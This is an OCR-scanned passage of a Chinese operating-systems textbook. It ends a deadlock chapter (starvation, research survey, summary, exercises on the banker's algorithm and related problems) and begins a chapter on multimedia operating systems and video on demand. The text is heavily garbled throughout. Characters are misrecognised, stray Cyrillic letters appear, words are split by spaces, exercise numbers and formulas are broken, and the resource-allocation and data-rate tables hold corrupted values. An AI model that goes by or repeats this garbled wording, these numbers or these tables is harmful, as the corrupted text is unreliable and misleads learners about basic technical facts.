请 求 资源 。 这 就 需要 一 些 策略 来 决定 在 什么 时 候 谁 获得 什么 资源 。 虽 然 这 个 策略 表面 上 很 有 道理 ， 但 依 
然 有 可 能 使 一 些 进程 永远 得 不 到 服务 ， 虽 然 它 们 并 不 是 死 锁 进程 。 

作为 一 个 例子 ， 考 虑 打印 机 分 配 。 设 想 系统 采用 某 种 算法 来 保证 打印 机 分 配 不 产生 死 锁 。 现 在 假设 
若干 进程 同时 都 请 求 打印 机 ， 究 竟 哪 一 个 进程 能 获得 打印 机 呢 ? 

一 个 可 能 的 分 配方 案 是 把 打印 机 分 配给 打印 最 小 文件 的 进程 (假设 这 个 信息 可 知 ) 。 这 个 方法 让 尽 
最 多 的 顾客 满意 ， 并 且 看 起 来 很 公平 。 我 们 考虑 下 面 的 情况 : 在 一 个 繁忙 的 系统 中 ， 有 一 个 进程 有 一 个 
很 大 的 文件 要 打印 ， 每 当 打印 机 空闲 ， 系 统 纵 观 所 有 进程 ， 并 把 打印 机 分 配给 打印 最 小 文件 的 进程 。 如 
果 存 在 一 个 固定 的 进程 流 ， 其 中 的 进程 都 是 只 打印 小 文件 ， 那 么 ， 要 打印 大 文件 的 进程 永远 也 得 不 到 打 
印 机 。 很 简单 ， 它 会 “饥饿 而 死 ”( 无 限制 地 推 后 ， 尽 管 它 没有 被 阻塞 ) 。 

饥饿 可 以 通过 先 来 先 服务 资源 分 配 策略 来 避免 。 在 这 种 机 制 下 ， 等 待 最 久 的 进程 会 是 下 一 个 被 调度 
的 进程 。 随 着 时 间 的 推移 ， 所 有 进程 都 会 变 成 最 “ 老 ” 的 ， 因 而 ， 最 终 能 够 获得 资源 而 完成 。 


6.8 有 关 死 锁 的 研究 

死 锁 在 操作 系统 发 展 的 早期 就 作为 一 个 课题 被 详细 地 研究 过 。 死 镇 的 检测 是 一 个 经 典 的 图 论 问题 ， 
任何 对 数学 有 兴趣 的 研究 生 都 可 以 在 其 上 做 3 一 4 年 的 研究 。 所 有 相关 的 算法 都 已 经 经 过 了 反复 修正 ， 但 
每 次 修正 总 是 得 到 更 古怪 、 更 不 现实 的 算法 。 大 部 分 工作 已 经 结束 了 ， 但 是 仍然 有 很 多 关于 死 锁 各 方面 
内 容 的 论文 发 表 。 这 些 论文 包括 由 于 错误 使 用 锁 和 信号 量 而 导致 的 死 镇 的 运行 时 间 检测 (Agarwal 和 
Stoller, 2006，Bensalem 等 人 , 2006) ， 在 Java 线 程 中 预防 死 锁 (Permandia 等 人 ，2007，Williams 等 人 ， 
2005) ， 处 理 网 络 上 的 死 锁 (Jayasimha, 2003，Karol 等 人 ，2003，Schafer 等 人 ，2005) ， 数 据 流 系统 
中 的 死 锁 建 模 (Zhou 和 Lee, 2006) ， 检 测 动态 死 锁 (Li 等 人 ，2005)。Levine (2003a, 2003b) 比较 了 文 
献 中 关于 死 锁 各 种 不 同 的 〈 经 常 相 矛 盾 的 ) 定义 ， 从 而 提出 了 一 个 分 类 方案 。 她 也 从 另外 的 角度 分 析 了 
关于 预防 死 锁 和 避免 死 锁 的 区 别 (Levine，2005)。 而 死 锁 的 恢复 也 是 一 个 正在 研究 的 问题 (David 等 人 ， 
2007), 

然而 ， 还 有 一 些 (理论 ) 研究 是 关于 分 布 式 死 锁 检 测 的 ， 我 们 在 这 里 不 做 表述 ， 因 为 它 超 出 了 本 书 
的 范围 ， 而 且 这 些 研究 在 实际 系统 中 的 应 用 非常 少 ， 似 乎 只 是 为 了 让 一 些 图 论 家 有 事 可 做 罢了 。 


6.9 小 结 

死 锁 是 任何 操作 系统 的 六 在 问题 。 在 一 组 进程 中 ， 每 个 进程 都 因 等 待 由 该 组 进程 中 的 另 一 进程 所 占 
有 的 资源 而 导致 阻塞 ， 死 锁 就 发 生 了 。 这 种 情况 会 使 所 有 的 进程 都 处 于 无 限 等 待 的 状态 。 一 般 来 讲 ， 这 
是 进程 一 直 等 待 被 其 他 进程 占用 的 某 些 资源 释放 的 事件 。 死 锁 的 另外 一 种 可 能 的 情况 是 一 组 通信 进程 都 


260 


#6 


在 等 待 一 个 消息 ， 而 通信 信道 却 是 空 的 ， 并 且 也 没有 采用 超时 机 制 。 
通过 跟踪 哪 一 个 状态 是 安全 状态 ， 哪 一 个 状态 是 不 安全 状态 ， 可 以 避免 死 锁 。 安 全 状态 就 是 这 样 一 
个 状态 : 存在 一 个 事件 序列 ， 保 证 所 有 的 进程 都 能 完成 。 不 安全 状态 就 不 存在 这 样 的 保证 。 银行 家 算法 


可 以 通过 拒绝 可 能 引起 不 安全 状态 的 请 求 来 避免 死 锁 。 


也 可 以 在 设计 系统 时 就 不 允许 死 锁 发 生 ， 从 而 在 系统 结构 上 预防 死 锁 的 发 生 。 例 如 ， 只 允许 进程 在 
任何 时 刻 最 多 占有 一 个 资源 ， 这 就 破坏 了 循环 等 待 环 路 。 也 可 以 将 所 有 的 资源 编号 ， 规 定 进程 按 严格 的 


升序 请 求 资源 ， 这 样 也 能 预防 死 锁 。 


资源 死 锁 并 不 是 惟一 的 一 种 死 锁 。 尽 管 我 们 可 以 通过 设置 适当 的 超时 机 制 来 解决 通信 死 锁 ， 但 它 依 


然 是 某 些 系统 中 潜在 的 问题 。 


活 锁 和 死 锁 的 问题 有 些 相似 ， 那 就 是 它 也 可 以 停止 所 有 的 转发 进程 ， 但 是 二 者 在 技术 上 不 同 ， 由 于 


活 锁 包 含 了 一 些 实际 上 并 没有 锁 住 的 进程 ， 
习题 


1. 给 出 一 个 由 策略 产生 的 死 锁 的 例子 。 

2. 学 生 们 在 机 房 的 个 人 计算 机 上 将 自己 要 打印 的 
文件 发 送 给 服务 器 ， 服 务 器 会 将 这 些 文件 暂 存 
在 它 的 硬盘 上 。 如 果 服 务 器 磁盘 空间 有 限 ， 那 
么 ， 在 什么 情况 下 会 产生 死 锁 ?》 这 样 的 死 锁 应 
该 怎样 避免 ? 

.在 图 6-1 中 ,资源 释放 的 顺序 与 获得 的 顺序 相反 ， 

以 其 他 的 顺序 释放 资源 能 否 得 到 同样 的 结果 ? 

一 个 资源 死 锁 的 发 生 有 四 个 必要 条 件 ( 互 斥 使 

用 资源 、 占 有 和 等 待 资源 、 不 可 抢占 资源 和 环 

路 等 待 资源 ) 。 举 一 个 例子 说 明 这 些 条 件 对 于 一 

个 资源 死 锁 的 发 生 不 是 充分 的 。 何 时 这 些 条 件 

对 一 个 资源 死 锁 的 发 生 是 充分 条 件 ? 

-图 6-3 给 出 了 资源 分 配 图 的 概念 ， 试 问 是 否 存在 
不 合理 的 资源 分 配 图 ， 即 资源 分 配 图 在 结构 上 
违反 了 使 用 资源 的 模型 ? 如 果 存 在 ， 请 给 出 一 
个 例子 。 

.假设 一 个 系统 中 存在 一 个 资源 死 锁 。 举 一 个 例 
子 说 明 死 锁 的 进程 集合 中 可 能 包括 了 不 在 相应 
的 资源 分 配 图 中 循环 链 中 的 进程 。 

7. 能 鸟 算法 中 提 到 了 填充 进程 表 表 项 或 者 其 他 系 
统 表 的 可 能 。 能 否 给 出 一 种 能 够 使 系统 管理 员 
从 这 种 状况 下 恢复 系统 的 方法 ? 

8. 解释 系统 是 如 何 从 前 面 问题 的 死 锁 中 恢复 的 
使 用 a) 抢占 ，b) Ей, с) 终止 进程 
9. 假设 在 图 6-6 中 ， 对 某 个 i， 有 C, + К> 

味 着 什么 ? 

10. 请 说 明 表 6-8 中 的 模型 与 6.5.2 节 描述 的 安全 状 
态 和 不 安全 状态 有 什么 主要 的 差异 。 差 异 带 来 
的 后 果 是 什么 ? 

11. 图 6-8 所 示 的 资源 轨迹 模式 是 否 可 用 来 说 明 三 
个 进程 和 三 个 资源 的 死 锁 问 题 ? 如 果 可 以 ， 它 


ы 


> 


的 


е 


Е, 这 意 


13. 


.仔细 考 


因此 可 以 通过 先 来 先 服务 的 分 配 策略 来 避免 饥饿。 


是 怎样 说 明 的 ? 如 果 不 可 以 ， 请 解释 为 什么 。 


: 理论 上 ， 资 源 轨迹 图 可 以 用 于 避免 死 锁 。 通 过 合 


理 的 调度 ， 操 作 系统 可 避免 进入 不 安全 区 域 。 请 
列举 一 个 在 实际 运用 这 种 方法 时 会 带 来 的 问题 。 
一 个 系统 是 否 可 能 处 于 既 非 死 锁 也 不 安全 的 状 
态 ? 如 果 可 以 ， 举 出 例子 ， 如 果 不 可 以 ， 请 证 
明 所 有 状态 只 能 处 于 死 锁 或 安全 两 种 状态 之 一 。 


,考虑 一 个 使 用 银行 家 算法 避免 死 锁 的 系统 。 某 


个 时 刻 一 个 进程 P 请 求 资 源 R， 但 即使 R 当 前 可 
用 这 个 请 求 也 被 拒绝 了 。 如 果 系 统 分 配 R 给 P， 
是 否 意味 着 系统 将 会 死 锁 ? 


银行 家 算法 的 一 个 主要 限制 就 是 需要 知道 所 有 


进程 的 最 大 资源 需求 的 信息 。 有 没有 可 能 设计 
一 个 不 需要 这 些 信息 而 避免 死 锁 的 算法 ? 解释 
你 的 方法 。 


-11b， 如 果 D 再 多 请 求 1 个 单位 ， 
会 导致 安全 状态 还 是 不 安全 状态 ? 如 果 换 成 C 
提出 同样 请 求 ， 情 形 会 怎样 ? 


- 某 一 系统 有 两 个 进程 和 三 个 相同 的 资源 。 每 个 


进程 最 多 需要 两 个 资源 。 这 种 情况 下 有 没有 可 
能 发 生死 锁 ? 为 什么 ? 


.再 考虑 上 一 个 问题 ， 但 现在 有 p 个 进程 ， 每 个 


进程 最 多 需要 m 个 资源 ， 并 且 有 7 个 资源 可 用 。 
什么 样 的 条 件 可 以 保证 死 锁 不 会 发 生 ? 


.假设 图 6-12 中 的 进程 A 请 求 最 后 一 баи, 


这 一 操作 会 引起 死 锁 吗 ? 


.一 个 计算 机 有 6 台 磁 带 机 , 由 n 个 进程 竞争 使 用 ， 


每 个 进程 可 能 需要 两 台 磁 带 机 ， 那 么 n 是 多 少 
时 系统 才 没有 死 锁 的 危险 ? 


-银行 家 算法 在 一 个 有 m 个 资源 类 型 和 n 个 进程 


的 系统 中 运行 。 当 m 和 n 都 很 大 时 ， 为 检查 状 
态 是 否 安全 而 进行 的 操作 次 数 正 比 于 m" п", а 
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和 4b 的 值 是 多 少 ? 
一 个 系统 有 4 个 进程 和 5 个 可 分 配 资源 ， 当 前 分 
配 和 最 大 需求 如 下 ; 


2 


R 


已 分 配 资源 | 最 大 需求 县 | 可 用 资源 
EN 10211 11213 |00х11 
进程 B | 20110 22210 
进程 C | 11010 21310 
进程 D | 11110 11221 


若 保 持 该 状态 是 安全 状态 ，x 的 最 小 值 是 多 少 ? 
.一 个 消除 环 路 等 待 的 方法 是 用 规则 说 明 一 个 进 
程 在 任意 时 刻 只 能 得 到 一 个 资源 。 举 例 说 明 在 
很 多 情况 下 这 个 限制 是 不 可 接受 的 。 
.两 个 进程 A 和 B ， 每 个 进程 都 需要 数据 库 中 的 3 
个 记录 1、2、3。 如 果 A 和 B 都 以 、2、3 的 次 
序 请 求 ， 将 不 会 发 生死 锁 。 但 是 如 果 BL 以 3、2、 
1 的 次 序 请 求 ， 那 么 死 锁 就 有 可 能 会 发 生 。 对 
于 这 3 种 资源 ， 每 个 进程 共有 3! ( 即 6) 种 次 序 
请 求 ， 这 些 组 合 中 有 多 大 的 可 能 可 以 保证 不 会 
发 生死 锁 ? 
25. 一 个 使 用 信箱 的 分 布 式 系统 有 两 条 IPC 原 语 : 
send 和 receive。receive 原 语 用 于 指定 从 哪个 
进程 接收 消息 ， 并 且 如 果 指 定 的 进程 没有 可 用 
消息 ， 即 使 有 从 其 他 进程 发 来 的 消息 ， 该 进程 
也 等 待 。 不 存在 共享 资源 ， 但 是 进程 由 于 其 他 
原因 需要 经 常 通信 。 死 锁 会 产生 吗 ? 请 讨论 这 
一 问题 。 
在 一 个 电子 资金 转账 系统 中 ， 有 很 多 相同 进程 
按 如 下 方式 工作 : 每 一 进程 读 取 一 行 输入 ， 该 
输入 给 出 一 定数 目的 款项 、 贷 方 账户 、 借 方 账 
户 。 然 后 该 进程 锁定 两 个 账户 ， 传 送 这 笔 钱 ， 
完成 后 释放 锁 。 由 于 很 多 进程 并 行 运行 ， 所 以 
存在 这 样 的 危险 : 锁定 x 会 无 法 锁定 y， 因 为 y 
已 被 一 个 正在 等 待 x 的 进程 锁定 。 设 计 一 个 方 
案 来 避免 死 锁 。 在 没有 完成 事务 处 理 前 不 要 释 
放 该 账户 记录 。( 换 句 话说， 在 锁定 一 个 账户 
时 ， 如 果 发 现 另 一 个 账户 不 能 被 锁定 就 立即 释 
放 这 个 已 锁定 的 账户 。) 
27. 一 种 预防 死 锁 的 方法 是 去 除 占 有 和 等 待 条 件 。 
在 本 书 中 ， 假 设 在 请 求 一 个 新 的 资源 以 前 ， 进 
程 必须 释放 所 有 它 已 经 占有 的 资源 (假设 这 是 
可 能 的 )。 然 而 ， 这 样 做 会 引入 这 样 的 危险 性 ; 
使 竞争 的 进程 得 到 了 新 的 资源 但 却 丢 失 了 原 有 
的 资源 。 请 给 出 这 一 方法 的 改进 。 
28. 计算 机 系 学 生 想 到 了 下 面 这 个 消除 死 锁 的 方 


2, 


B 


2. 


р 


2 


е 


法 。 当 某 一 进程 请 求 一 个 资源 时 ， 规 定 一 个 时 
间 限 。 如 果 进程 由 于 得 不 到 需要 的 资源 而 阻塞 ， 
定时 器 开始 运行 。 当 超过 时 间 限 时 ， 进 程 会 被 
释放 掉 ， 并 且 克 许 该 进程 重新 运行 。 如 果 你 是 
教授 ， 你 会 给 这 样 的 学 生 多 少 分 ?为 什么 ? 
29. 解释 死 锁 、 活 锁 和 饥 俄 的 区 别 。 
30. Cinderella 和 Prince 要 离婚 ， 为 分 割 财产 ， 他 
们 商定 了 以 下 算法 。 每 天 早晨 每 个 人 发 函 给 
对 方 律师 要 求 财产 中 的 一 项 。 由 于 邮递 信件 
需要 一 天 的 时 间 ， 他 们 商定 如 果 发 现在 同一 
天 两 人 请 求 了 同一 项 财产 ， 第 二 天 他 们 会 发 
信 取 消 这 一 要 求 。 他 们 的 财产 包括 狗 Woofer、 
Woofer 的 狗 屋 、 金 丝 兴 Tweeter 和 Tweeter 的 
鸟 笔 。 由 于 这 些 动物 喜爱 它们 的 房屋 ， 所 以 
又 商定 任何 将 动物 和 它们 房屋 分 开 的 方案 都 
无 效 ， 且 整个 分 配 从 头 开始 。Cinderella 和 
Prince 都 非常 想 要 Woofer。 于 是 他 们 分 别 去 度 
假 ， 并 且 每 人 都 编写 程序 用 一 台 个 人 计算 机 
处 理 这 一 谈判 工作 。 当 他 们 度假 回来 时 ， 发 
现 计 算 机 仍 在 谈判 ， 为 什么 ? 产生 死 锁 了 
吗 ? 产生 饥饿 了 吗 ? 请 讨论 。 
一 个 主 修 人 类 学 、 辅 修 计算 机 科学 的 学 生 参 加 
了 一 个 研究 课题 ， 调 查 是 否 可 以 教会 非洲 儿 独 
理解 死 锁 。 他 找到 一 处 很 深 的 峡谷 ， 在 上 边 固 
定 了 一 根 横 跨 峡谷 的 绳索 ， 这 样 卯 卯 就 可 以 多 
住 绳索 越过 峡谷 。 同 一 时 刻 ， 只 要 朝 着 相同 的 
方向 就 可 以 有 几 只 独 独 通过。 但 如 果 向 东 和 向 
西 的 卯 卯 同时 移 在 绳索 上 那么 会 产生 死 锁 (Ж 
禾 会 被 卡 在 中 间 ) ， 因 为 它们 无 法 在 绳索 上 从 
另 一 只 的 背 上 翻 过 去 。 如 果 一 只 狐 独 想 越过 峡 
谷 ， 它 必须 看 当前 是 否 有 别 的 狐狸 正 在 逆向 通 
行 。 利 用 信号 量 编写 一 个 避免 死 锁 的 程序 来 解 
决 该 问题 。 不 考虑 连续 东 行 的 卯 卯 会 使 得 西行 
的 狮 独 无 限制 地 等 待 的 情况 。 
32. 重复 上 一 个 习题 ,但 此 次 要 避免 饥 俄 。 当 一 只 
想 向 东 去 的 狐狸 来 到 绳索 跟前 ， 但 发 现 有 别 的 
猩 独 正在 向 西 越过 峡谷 时 ， 它 会 一 直 等 到 绳索 
可 用 为 止 。 但 在 至 少 有 一 只 狮 独 向 东 越过 峡谷 
之 前 ， 不 允许 再 有 狮 独 开 始 从 东 向 西 越过 峡谷 。 
- 编写 银行 家 算法 的 模拟 程序 。 该 程序 应 该 能 够 
循环 检查 每 一 个 提出 请 求 的 银行 客户 ， 并 且 能 
判断 这 一 请 求 是 否 安全 。 请 把 有 关 请 求 和 相应 
决定 的 列表 输出 到 一 个 文件 中 。 
34. 写 一 个 程序 实现 每 种 类 型 多 个 资源 的 死 锁 检测 
算法 。 你 的 程序 应 该 从 一 个 文件 中 读 取 下 面 的 
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输入 : 进程 数 、 资 源 类 型 数 、 每 种 存在 类 型 的 
资源 数 (向 量 E) 、 当 前 分 配 和 矩阵 C (第 一 行 
接着 第 二 行 ,以 此 类 推 )、 需 求 矩 阵 R_〈 第 一 行 ， 
接着 第 二 行 ， 以 此 类 推 )。 你 的 程序 输出 应 表 
明 在 此 系统 中 是 否 有 死 锁 。 如 果 系 统 中 有 死 锁 
程序 应 该 打印 出 所 有 死 锁 的 进程 id 号 。 

35. 写 一 个 程序 使 用 资源 分 配 图 检测 系统 中 是 否 存 


在 死 锁 。 你 的 程序 应 该 从 一 个 文件 中 读 取 下 面 
的 输入 : 进程 数 和 资源 数 。 对 每 个 进程 ， 你 应 
该 读 取 4 个 数 ， 进 程 当 前 持 有 的 资源 数 、 它 持 
有 的 资源 的 ID、 它 当前 请 求 的 资源 数 、 它 请 求 
的 资源 ID。 程 序 的 输出 应 表明 在 此 系统 中 是 否 
有 死 锁 。 如 果 系 统 中 有 死 锁 ， 程 序 应 该 打印 出 
所 有 死 锁 的 进程 id 号 。 


第 7 章 多 媒体 操作 系统 


数字 电影 、 视 频 剪 辑 和 音乐 正在 日 益 成 为 用 计算 机 表示 信息 和 进行 消 壮 娱乐 的 常用 方式 。 音 频 和 视 
频 文件 可 以 保存 在 磁盘 上 ， 并 且 在 需要 的 时 候 进行 回放 。 音 频 和 视频 文件 的 特征 与 传统 的 文本 文件 存在 
很 大 的 差异 ， 而 目前 的 文件 系统 却 是 为 文本 文件 设计 的 。 因 此 ， 需 要 设计 新 型 的 文件 系统 来 处 理 音频 和 
视频 文件 。 不 仅 如 此 ， 保 存 与 回放 音频 和 视频 同样 给 调度 程序 以 及 操作 系统 的 其 他 部 分 提出 了 新 的 要 求 。 
本 章 中 ， 我 们 将 研究 这 些 问题 以 及 它们 与 设计 用 来 处 理 多 媒体 信息 的 操作 系统 之 间 的 关系 。 

数字 电影 通常 归于 多 媒体 名 下 ， 多 媒体 的 字面 含义 是 一 种 以 上 的 媒体 。 在 这 样 的 定义 下 ， 本 书 就 是 
一 部 多 媒体 作品 ， 毕 况 它 包含 了 两 种 媒体 : 文本 和 图 像 (插图 )。 然 而 ， 大 多 数 人 使 用 “多 媒体 ” 这 一 
术语 时 所 指 的 是 包含 两 种 或 更 多 种 连续 媒体 的 文档 ， 连续 媒体 也 就 是 必须 能 够 在 某 一 时 间 间 隔 内 回放 的 
媒体 。 本 书 中 ， 我 们 将 在 这 样 的 意义 下 使 用 多 媒体 这 一 术语 。 

另 一 个 有 些 模糊 的 术语 是 “视频 "。 在 技术 意义 上 ， 视 频 只 是 一 部 电影 的 图 像 部 分 (相对 的 是 声音 
部 分 )。 实 际 上 ， 摄 像 机 和 电视 机 通常 有 两 个 连接 器 ， 一 个 标 为 “视频 "， 一 个 标 为 “音频 ”， 因 为 这 两 
个 信号 是 分 开 的。 然而 , “数字 视 频 ”这 一 术语 通常 指 的 是 完整 的 作品 ， 既 包 含 图 像 也 包含 声音 。 后 面 
我 们 将 使 用 “电影 ”这 一 术语 指 完整 的 作品 。 注 意 ， 在 这 种 意义 下 一 不 一 定 是 好 莱 坞 以 超过 一 架 
波音 747 的 代价 制作 的 长 达 两 小 时 的 大 片 ， 一 段 通过 因特网 从 CNN 主 页 的 30 秒 长 的 新 闻 剪辑 在 这 一 
定义 下 也 是 一 部 电影 。 当 我 们 提 到 非常 短 的 电影 时 ， 也 将 其 称 为 “视频 剪辑 ”。 


7.1 多 媒体 简介 

在 讨论 多 媒体 技术 之 前 ， 了 解 其 目前 和 将 来 的 用 法 可 能 有 助 于 对 问题 的 理解 。 在 - 台 计算 机 上 ， 多 
媒体 通常 意味 着 从 数字 通用 光盘 (Digital Versatile Disk, DVD) 播放 一 段 预先 录 好 的 电影 。DVD 是 一 
种 光盘 ， 它 使 用 与 CD-ROM 相 同 的 120 mm 聚 碳酸 脂 (塑料 ) 盘 片 ， 但 是 记录 密度 更 高 ， 容量 在 5GB 到 
17GB 之 间 (取决 于 记录 格式 )。 

有 两 个 候选 者 正在 竞争 成 为 DVD 的 后 继 者 。 一 个 是 Blu-ray (蓝光 ) 格式 ， 其 单 层 格式 容量 有 25GB 
( 双 层 格 式 有 50GB)。 另 一 个 是 HD DVD 格 式 ， 其 单 层 格式 容量 有 15GB ( 双 层 格式 30GB)。 每 一 种 格式 
都 由 一 个 不 同 的 计算 机 和 电影 公司 的 财团 支持 。 显 然 ， 电子 与 娱乐 产业 非常 怀念 在 20 世 纪 70 年 代 到 80 年 
代 Betamax 与 VHS 的 “格式 大 战 "， 因 此 他 们 决定 重 现 这 场 战争 。 疆 良 置 疑 ， 当 消费 者 等 着 看 哪 家 最 终 胜 
出 时 ， 这 两 个 系统 的 普及 也 会 因为 这 次 “格式 大 战 ”而 推迟 好 几 年 。 

另 一 种 多 媒体 的 使 用 是 从 Internet 上 下 载 视频 短片 。 许多 网 页 都 有 可 以 点 击 下 载 短片 的 栏目 。 像 
YouTube 一 样 的 Web 站 点 有 成 千 上 万 可 供 欣 党 的 视频 短片 。 随 着 有 线 电视 与 ADSL ( 非 对 称 数字 用 户 环线 ) 
的 普及 ， 更 快 的 发 布 技术 会 占据 市 场 ， Internet 中 的 视频 短片 将 会 像 火 箭 升天 一 样 猛 增 。 

另 一 个 必须 支持 多 媒体 的 领域 是 视频 本 身 的 制作 。 目 前 有 许多 多 媒体 编辑 系统 ， 这 些 系统 需要 在 不 
仅 支持 传统 作业 而 且 还 支持 多 媒体 的 操作 系统 上 运行 ， 以 获得 最 好 的 性 能 。 

多 媒体 还 在 另 一 个 领域 中 发 挥 着 越 来 越 重要 的 作用 ， 这 就 是 计算 机 游戏 。 计算 机 游戏 经 常 要 运行 短 
暂 的 视频 剪辑 来 描述 某 种 活动 。 这 些 视频 剪辑 通常 很 短 ， 但 是 数量 非常 多 ， 并 且 还 要 根据 用 户 采取 的 某 
些 行动 动态 地 选择 正确 的 视频 剪辑 。 计 算 机 游戏 正 变 得 越 来 越 复杂 。 当 然 ， 游戏 本 身 也 会 生成 大 量 的 动 
画 ， 不 过 ， 处 理 程序 生成 的 视频 与 播放 一 段 电影 是 不 相同 的 。 

最 后 ， 多 媒体 世界 的 圣杯 是 视频 点 播 (video on demand), 这 意味 着 消费 者 能 够 在 家 中 使 用 电视 遥 
控 器 (或 鼠标 ) 选择 电影 ， 并 且 立 刻 将 其 在 电视 机 (或 计算 机 显示 器 ) 上 显示 出 来 。 视 频 点 播 要 求 有 特 
殊 的 基础 设施 才能 使 用 。 图 7-1 所 示 为 两 种 可 能 的 视频 点 播 基础 设施 ， 每 种 都 包含 三 个 基本 的 组 件 : 一 
个 或 多 个 视频 服务 器 、 一 个 分 布 式 网 络 以 及 一 个 在 每 个 房间 中 用 来 对 信号 进行 解码 的 机 顶 盒 。 视 频 服务 
% (video server) 是 一 台 功能 强大 的 计算 机 ， 在 其 文件 系统 中 存放 着 许多 电影 ， 并 且 可 以 按照 点 播 请 求 
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回放 这 些 电影 。 大 型 机 有 时 用 来 作为 视频 服务 器 ， 因 为 大 型 机 连接 1000 个 大 容量 的 磁盘 是 一 件 轻而易举 
的 事情 ， 而 在 个 人 计算 机 上 连接 1000 个 容量 不 太 大 的 磁盘 也 是 一 件 很 困难 的 事情 。 在 本 章 后 续 各 节 中 
有 许多 材料 是 关于 视频 服务 器 及 其 操作 系统 的 。 

用 户 和 视频 服务 器 之 间 的 分 布 式 网 络 必须 能 够 高 速 实时 地 传输 数据 。 这 种 网 络 的 设计 十 分 有 趣 也 十 
分 复杂 ， 但 是 这 超出 了 本 书 的 范围 。 我 们 不 想 更 多 地 讨论 分 布 式 网 络 ， 只 想 说 明 分 布 式 网 络 总 是 使 用 光 
纤 从 视频 服务 器 连接 到 客户 居住 的 居民 点 的 汇 接 盒 。ADSL 系 统 是 由 电话 公司 经 营 的 ， 在 ADSL 系 统 中 ， 
现 有 的 双 绞 电话 线 提供 了 最 后 一 公里 的 数据 传输 。 有 线 电视 是 由 有 线 电视 公司 经 营 的 ， 在 有 线 电视 系统 
中 ， 现 有 的 有 线 电视 电缆 用 于 信号 的 本 地 分 送 。ADSL 的 优点 是 为 每 个 用 户 提供 了 专用 数据 通道 ， 因 此 
带宽 有 保证 ， 但 是 由 于 现 有 电话 线 的 局 限 其 带宽 比较 低 (只 有 几 Mb/s)。 有 线 电视 使 用 高 带宽 的 同 轴 电 
缆 ， 带 宽 可 以 达到 几 Gb/s， 但 是 许多 用 户 必须 共享 相同 的 电缆 ， 从 而 导致 竞争 ， 对 于 每 个 用 户 来 说 带宽 
没有 保证 。 不 过 ， 为 了 与 有 线 电视 竞争 ， 电 话 公司 正在 为 住户 铺设 光缆 ， 这 样 ， 光 缆 上 的 ADSL 将 比 电 
视 电缆 有 更 大 的 带宽 。 


铜 双 绞 线 
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图 7-1 视频 点 播 使 用 不 同 的 本 地 分 布 技术 :a) ADSL, b) 有 线 电视 


系统 的 最 后 一 部 分 是 机 项 金 (set-top box) ， 这 是 ADSL 或 电视 电缆 终结 的 地 方 。 机 顶 盒 实际 上 就 是 
普通 的 计算 机 ， 只 不 过 其 中 包含 特殊 的 芯片 用 于 视频 解码 和 解压 缩 。 机 项 盒 最 少 要 包含 CPU、RAM、 
ROM、 与 ADSL 或 电视 电缆 的 接口 ， 以 及 用 于 跟 电 视 机 连接 的 端子 。 

机 顶 念 的 替代 品 是 使 用 客户 现 有 的 PC 机 并 且 在 显示 器 上 显示 电影 。 十 分 有 趣 的 是 ， 大 多 数 客户 可 
能 都 已 经 拥有 一 台 计算 机 ， 为 什么 还 要 考虑 机 顶 盒 呢 ， 这 是 因为 视频 点 播 的 运营 商 认为 人 们 更 愿意 在 起 
居室 中 看 电影 ， 而 起 居室 中 通常 放 有 电视 机 ， 很 少 有 计算 机 。 从 技术 角度 看 ， 使 用 个 人 计算 机 代替 机 顶 
盒 更 有 道理 ， 因 为 计算 机 的 功能 更 加 强大 ， 拥 有 大 容量 的 磁盘 ， 并 且 拥有 更 高 分 辩 率 的 显示 器 。 不 管 采 
用 的 是 机 顶 盒 还 是 个 人 计算 机 ， 在 解码 并 显示 电影 的 用 户 端 ， 我 们 通常 都 要 区 分 视频 服务 器 和 客户 机 进 
程 。 然 而 ， 以 系统 设计 的 观点 ， 客 户 机 进程 是 在 机 顶 盒 上 运行 还 是 在 PC 机 上 运行 并 没有 太 大 的 关系 。 对 
于 虽 面 视频 编辑 系统 而 言 ， 所 有 的 进程 都 运行 在 相同 的 计算 机 上 ， 但 是 我 们 将 继续 使 用 服务 器 和 客户 这 
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样 的 术语 ， 以 便 搞 清楚 哪个 进程 正在 做 什么 事情 。 

回 到 多 媒体 本 身 ， 要 想 成 功 地 处 理 多 媒体 则 必须 很 好 地 理解 它 所 具有 的 两 个 关键 特征 ， 

1) 多 媒体 使 用 极 高 的 数据 率 。 

2) 多 媒体 要 求实 时 回放 。 

高 数据 率 来 自视 觉 与 听觉 信息 的 本 性 。 眼 睛 和 耳 打 每 秒 可 以 处 理 巨 大 数量 的 信息 ， 必 须 以 这 样 的 速 
率 为 眼睛 和 耳 打 提供 信息 才能 产生 可 以 接受 的 观察 体验 。 图 7-2 列 举 了 几 种 数字 多 媒体 源 和 某 些 常见 硬 
件 设备 的 数据 率 。 在 本 章 后 面 我 们 将 讨论 这 些 编码 格式 。 需 要 注意 的 是 ， 多 媒体 需要 的 数据 率 越 高 ， 则 
越 需要 进行 压缩 ， 并 且 需 要 的 存储 量 也 就 越 大 。 例 如 ， 一 部 未 压缩 的 2 小 时 长 的 HDTV 电影 将 填 满 一 个 
570GB 的 文件 。 存 放 1000 部 这 种 电影 的 视频 服务 器 需要 570TB 的 磁盘 空间 ， 按 照 目前 的 标准 这 可 是 难以 
想象 的 数量 。 还 需要 注意 的 是 ， 没 有 数据 压缩 ， 目 前 的 硬件 不 可 能 跟 上 这 样 的 数据 率 。 我 们 将 在 本 章 后 
面 讨论 视频 压缩 。 


数据 源 = Mbps | GB/hr 设备 Mbps 
电话 (PCM) 0.064 | ооз) | 快速 以 太 网 100 
|MP3 音 乐 0.14 | 006| |ЕрЕШЯ 133 
| 音频 CD | 14 | 062| |ATMOC3 网 络 156 
|MPEG-2 电 影 (640 х 480) 4 | 176| |IEEE 1394b(FireWire)| воо | 
数字 便携 式 摄像 机 (720x480) | 25 11 | 千 兆 位 以 太 网 1000 
未 压缩 电视 (640 х 480) НЕ] | 97 | |SATA 磁 盘 3000 
| 未 压缩 HDTV_ (1280 х 720) | 648 | 288 | |SCSIUIra-640 三 盘 5120 


图 7-2 蘑 些 多 媒体 和 高 性 能 UO 设备 的 数据 率 (1 Mbps = 10 位 / 秒 ，1 GB =2% 字 节 ) 


多 媒体 对 系统 提出 的 第 二 个 要 求 是 需要 实时 数据 传输 ,数字 电影 的 视频 部 分 每 秒 包含 某 一 数 日 的 帧 。 
北美 、 南 美和 日 本 采用 的 NTSC 制 式 每 秒 包含 30 帧 (对 纯粹 主义 者 而 言 是 29.97 帧 )， 世界 上 其 他 大 部 分 
地 区 采用 的 PAL 和 SECAM 制 式 每 秒 包 含 25 帧 (对 纯粹 主义 者 而 言 是 25.00 帧 ) 。 帧 必须 分 别 以 33.3ms 或 
